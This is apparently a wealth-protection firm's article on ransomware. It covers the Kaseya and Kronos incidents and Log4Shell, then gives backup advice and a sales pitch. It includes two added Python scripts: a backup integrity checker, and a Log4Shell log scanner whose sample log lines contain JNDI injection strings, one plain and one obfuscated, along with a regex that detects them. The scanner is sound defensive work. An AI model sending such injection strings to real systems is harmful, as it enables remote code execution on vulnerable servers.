The Growing Threat of Ransomware
We first warned readers of the dangers of ransomware in 2007, comparing it to the kidnapping of your data.
Today, ransomware isn’t just a tech problem—it’s a direct threat to your financial security and personal privacy. As part of a broader strategy for wealth protection, it’s crucial to understand how ransomware can be used to extort, disrupt, and destroy your most valuable digital assets.
What Happens During a Ransomware Attack?
If you’ve been a victim of a ransomware attack, you’ll notice your system is much slower than usual. One victim called it “molasses in January.” Next, you’ll see text files appear on your desktop or in the “My Documents” folder. They’re usually entitled “README.TXT” or something similar.
The message will say something like:
“Hello, your files are now securely encrypted using an unbreakable 4096-bit algorithm. If you try to decrypt them, they will be automatically wiped. The only way to decrypt them and avoid their destruction is to purchase our decryption key. The price is 1 BTC. To make payment arrangements, send an email message to .”
Ransomware Attacks on the Rise
Since 2007, though, there’s been an explosion in documented ransomware attacks. They’ve caused the most damage to organizations that provide software or networking as a service.
One high-profile attack in July 2021 was carried out by a Russian-based hacker group calling itself REvil. They targeted Kaseya, Ltd., a managed service provider (MSP) that helps its customers maintain their IT infrastructure and end-user systems.
The hackers focused on a Kaseya tool called VSA. It is used by at least 1,500 businesses and government agencies worldwide to manage digital services for their clients. REvil then encrypted the files of approximately 1,000 of their customers and demanded a ransom payment from each of them. The total ransom REvil received isn’t known. But the criminal gang demanded anywhere from a few thousand dollars to $5 million or more per victim to unlock their files.
But an attack discovered in December 2021 dwarfs the Kaseya incursion. It targeted a company called Kronos, which offers “workforce management and human capital management solutions.” Those solutions include scheduling, timekeeping, and payroll products called UKG Workforce Central, UKG TeleStaff, Banking Scheduling Solutions, and UKG Healthcare Extensions.
The Kronos Attack: A Case Study
On December 11, 2021, Kronos advised its customers of a “cyber security incident” that disrupted the Kronos Private Cloud. Their customers include major organizations like Tesla, the PUMA Group, the University of Illinois Health System, Kansas State University, the City of Cleveland, and the New York Metropolitan Transportation Authority. This disruption affected the networking system used to deploy scheduling, timekeeping, and payroll products.
The Financial and Legal Impact of Ransomware
The ramifications of such an attack extend beyond the immediate disruption. Consider the financial and legal consequences. If sensitive employee data—like names, addresses, social security numbers, and employee IDs—has been compromised, the liability could be immense. In addition to potential lawsuits, there’s also the risk of significant fines from regulatory bodies. Given the significant financial and legal risks, implementing effective ransomware protection strategies is more critical than ever.
Kronos then made a startling admission and recommendation:
“Given that it may take up to several weeks to restore system availability, we strongly recommend that you evaluate and implement alternative business continuity protocols related to the affected UKG solutions.”
In communications with individual clients, Kronos acknowledged that the attack “may have compromised employee information like names, addresses, social security numbers, and employee IDs.”
We have been in touch with one of the affected organizations—an institution with several thousand employees. Its chief technology officer acknowledges that for the moment, there is no way to track vacation time or sick time accrued. He also warned that the organization might not be able to provide timely tax forms for employees to file with their tax returns. He added that the organization’s IT department is “scouring the internet looking for reports of lost employee data,” and that “if we find any evidence that personal information has been compromised, we will share that information with employees.”
An employee of this institution whom I spoke to about the attack summarized the situation as a “sh*tshow.” He referred to the need to complete a “payroll adjustment form” to reflect holiday and overtime pay. His manager had also warned him it could be “months” before the payroll system was functioning normally.
How Did the Attack Happen?
It’s unclear how Kronos’ servers were infiltrated. Hackers typically spread ransomware by hiding malicious files in emails and phishing targeted individuals. But it’s possible that the hackers who targeted Kronos used a newly discovered vulnerability nicknamed “Log4Shell.” The flaw is in Apache Log4j, a logging library built into some of the world’s most widely used applications and services. Successful exploitation can give an attacker full control of the targeted system.
Hackers using Log4Shell as an attack vector don’t need anyone to click on a poisoned link; they only need to get the target system to write a short, specially crafted string to its logs. Hackers can infect a system by sending the string in an email message or setting it as an account username.
Apache released an upgrade to repair the flaw on December 17, 2021. Companies worldwide rushed to incorporate it into their security architecture. Among the companies affected are Amazon Web Services, Microsoft, Cisco, Google Cloud, and IBM. The head of the US Cybersecurity and Infrastructure Security Agency referred to the vulnerability as “one of the most serious I’ve seen in my entire career, if not the most serious.”
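Because the vulnerability is triggered by nothing more than a string being logged, one practical defensive check is to scan application and web-server logs for the lookup syntax that Log4Shell abuses. The scanner below is an added example, not code from the original article or from Apache; the log lines it scans are constructed, and the IP addresses in them are documentation ranges, not real hosts. It flags the direct lookup form as well as nested lookup expressions, which ordinary log messages almost never contain.

```python
import re
from dataclasses import dataclass
from typing import List

# Direct form of the lookup that Log4Shell abuses, e.g. "${jndi:...}" (case-insensitive).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample log lines (addresses are from documentation ranges).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    "login failed for user ${${lower:j}ndi:ldap://203.0.113.4/x}",
    "config loaded: base_dir=${env:HOME}/app",
]


@dataclass
class Finding:
    line_no: int   # 1-based index of the log line
    severity: str  # "high" or "low"
    reason: str
    snippet: str   # the text that triggered the finding


def max_lookup_depth(text: str) -> int:
    """Return the deepest nesting of "${ ... }" expressions in text.

    Normal log lines contain no lookup syntax; a lookup inside a lookup
    (depth 2 or more) is rarely legitimate and is treated as high severity.
    """
    depth = best = 0
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            best = max(best, depth)
            i += 2
        elif text[i] == "}" and depth > 0:
            depth -= 1
            i += 1
        else:
            i += 1
    return best


def first_lookup(text: str) -> str:
    """Return the first outermost "${...}" expression in text, for reporting."""
    start = text.find("${")
    if start < 0:
        return ""
    depth = 0
    for j in range(start, len(text)):
        if text.startswith("${", j):
            depth += 1
        elif text[j] == "}":
            depth -= 1
            if depth == 0:
                return text[start:j + 1]
    return text[start:]


def scan_line(line: str, line_no: int) -> List[Finding]:
    """Classify one log line; returns an empty list for benign lines."""
    if JNDI_RE.search(line):
        return [Finding(line_no, "high", "direct JNDI lookup in logged data", first_lookup(line))]
    depth = max_lookup_depth(line)
    if depth >= 2:
        return [Finding(line_no, "high", "nested lookup expression (possible obfuscation)", first_lookup(line))]
    if depth == 1:
        return [Finding(line_no, "low", "lookup expression in logged data", first_lookup(line))]
    return []


def scan_logs(lines: List[str]) -> List[Finding]:
    """Scan a sequence of log lines and collect every finding."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, start=1):
        findings.extend(scan_line(line, n))
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOGS):
        print(f"line {f.line_no} [{f.severity}] {f.reason}: {f.snippet}")
```

Run against the constructed sample, the scanner reports lines 2 and 3 as high severity and line 4 as a low-severity lookup worth a second look. A hit in a field that carries user-supplied input (a User-Agent, a username, an e-mail header) is the strongest signal; it tells you that someone attempted the technique against that system, which is exactly the kind of evidence an organization would want before deciding whether its logging stack was exposed.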
Ransomware Protection Strategies: Taking Action
So, how can you protect yourself from ransomware and its potentially devastating effects? Here are some actionable steps you can take to safeguard your assets:
- Back up your data daily and keep those backups offline. For individuals, an encrypted flash drive is ideal. Businesses should use tape backups that are stored offline, away from any network.
- Never respond to emails suggesting software running on your system needs to be updated. Almost any legitimate update will announce itself within the program to be updated, not in an email.
- Periodically test your backups and have a step-by-step plan for restoring critical network systems. That way, if your PC, smartphone, or network is ever infected with ransomware, you’ll be ready.
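“Test your backups” is only meaningful if the test can tell you which files came back intact. The script below is an added example, not code from the original article: it records a SHA-256 manifest of the data at backup time, then compares a restored copy against that manifest and reports what is missing, altered, or unexpected. The files it creates are constructed in a temporary directory so it runs stand-alone; in practice the manifest would be stored with the offline backup.

```python
import hashlib
import json
import shutil
import tempfile
from pathlib import Path
from typing import Dict


def file_sha256(path: Path) -> str:
    """Hash a file in chunks so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> Dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): file_sha256(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def verify_restore(manifest: Dict[str, str], restored_root: Path) -> dict:
    """Compare a restored directory tree against the manifest taken at backup time."""
    restored = build_manifest(restored_root)
    missing = sorted(k for k in manifest if k not in restored)
    changed = sorted(k for k in manifest if k in restored and restored[k] != manifest[k])
    extra = sorted(k for k in restored if k not in manifest)
    ok = sorted(k for k in manifest if k in restored and restored[k] == manifest[k])
    return {
        "ok": ok,
        "missing": missing,
        "changed": changed,
        "extra": extra,
        # A restore is only trustworthy when nothing is missing or altered.
        "restore_complete": not missing and not changed,
    }


def demo() -> dict:
    """Constructed scenario: back up three files, then check a deliberately bad restore."""
    with tempfile.TemporaryDirectory() as tmp:
        src = Path(tmp) / "live"
        (src / "docs").mkdir(parents=True)
        (src / "docs" / "notes.txt").write_text("quarterly notes\n")
        (src / "docs" / "ledger.csv").write_text("date,amount\n2021-12-11,100\n")
        (src / "config.ini").write_text("[app]\nmode=prod\n")

        # Record the manifest at backup time and round-trip it through JSON,
        # as it would be when stored alongside an offline backup.
        manifest_path = Path(tmp) / "manifest.json"
        manifest_path.write_text(json.dumps(build_manifest(src), indent=2))
        manifest = json.loads(manifest_path.read_text())

        # Simulate a restore that went wrong: one file truncated, one lost, one stray.
        restored = Path(tmp) / "restored"
        shutil.copytree(src, restored)
        (restored / "docs" / "ledger.csv").write_text("date,amount\n")
        (restored / "docs" / "notes.txt").unlink()
        (restored / "stray.tmp").write_text("x")

        return verify_restore(manifest, restored)


if __name__ == "__main__":
    report = demo()
    for key in ("ok", "missing", "changed", "extra"):
        print(f"{key:8}: {report[key]}")
    print("restore complete:", report["restore_complete"])
```

The design choice that matters is hashing at backup time rather than at restore time: the manifest is evidence of what the data looked like before an incident, so a file that was silently corrupted or encrypted before the last backup shows up as “changed” against an older manifest, and a file that never made it onto the backup medium shows up as “missing” before you need it.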
Develop a Comprehensive Cybersecurity Strategy
Beyond these steps, ransomware protection should be part of a wider cybersecurity plan. That plan should include regular security audits, employee training on recognizing phishing attempts, and collaboration with cybersecurity professionals to strengthen your defenses.
Stay Proactive: Have a Plan B
Lastly, always have a Plan B. Whether it’s having alternative systems ready to go, keeping physical copies of critical documents, or considering cyber insurance to mitigate potential losses, being prepared for the worst is key. Remember, the goal isn’t just to survive a ransomware attack, but to emerge from it with minimal disruption to your life and business.
By staying vigilant and implementing these ransomware protection strategies, you can significantly reduce your risk and protect what matters most—your assets, privacy, and peace of mind.
Need Help?
Since 1984, we’ve helped more than 15,000 customers and clients protect their wealth using proven, low-risk domestic and offshore planning. To see if our planning is right for you, please book a free no-obligation call with one of our Associates. You can do that here.